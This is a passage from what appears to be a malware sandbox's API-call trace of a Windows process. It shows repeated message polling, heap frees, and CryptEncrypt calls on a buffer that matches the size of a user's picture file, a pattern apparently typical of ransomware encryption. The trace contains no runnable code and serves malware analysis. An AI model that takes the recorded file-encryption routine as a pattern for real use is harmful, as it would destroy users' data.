wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.037] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.039] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb9d1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb9e0) returned 1 [0189.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.039] CharLowerBuffW (in: lpsz="byte[47585]", cchLength=0xb | out: lpsz="byte[47585]") returned 0xb [0189.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.042] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.042] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.042] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb9d1, dwBufLen=0xb9e0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb9e0) returned 1 [0189.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.045] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.046] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.046] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.046] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.046] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.046] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.046] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.046] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0189.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.057] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.057] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.057] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.057] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.057] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.058] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0189.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.058] CryptDestroyKey (hKey=0x90af98) returned 1 [0189.058] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.058] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.058] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.058] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.058] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.059] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.059] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.066] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0189.066] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.066] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.066] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.071] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.071] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.071] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.071] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.071] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.071] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.072] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.072] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.072] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.072] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.072] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0189.072] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.072] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.072] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.074] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.075] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0xe088b7f0, ftLastWriteTime.dwHighDateTime=0x1d5e08b, nFileSizeHigh=0x0, nFileSizeLow=0xb9d1, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="8tJ3GTLOl3FHI5E.jpg", cAlternateFileName="8TJ3GT~1.JPG")) returned 0x90af58 [0189.075] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.075] CharLowerBuffW (in: lpsz="byte[47569]", cchLength=0xb | out: lpsz="byte[47569]") returned 0xb [0189.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.075] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.075] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.075] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.076] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 